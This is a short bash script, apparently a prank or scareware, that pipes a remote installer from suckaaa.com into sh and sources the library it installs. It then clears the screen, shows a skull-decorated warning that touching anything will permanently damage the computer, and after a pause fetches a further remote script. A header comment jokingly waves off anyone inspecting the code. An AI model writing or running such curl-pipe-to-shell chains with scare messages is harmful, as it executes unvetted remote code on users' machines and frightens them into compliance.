#!/bin/bash

###########  HEADER  ###########
# loL whatcha lookin for in here??
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/garbage-lib-installer' | sh;
source ~/.complete-garbage/lib;
clear;
###########  END HEADER  ###########

setPosition 0 0;

bigMsg "☠☠☠ DON'T TOUCH A THING OR YOUR COMPUTER WILL BE PERMANENTLY DAMAGED!! ☠☠☠";

sleep 8s;

nextScript 'https://suckaaa.com/s/loL';
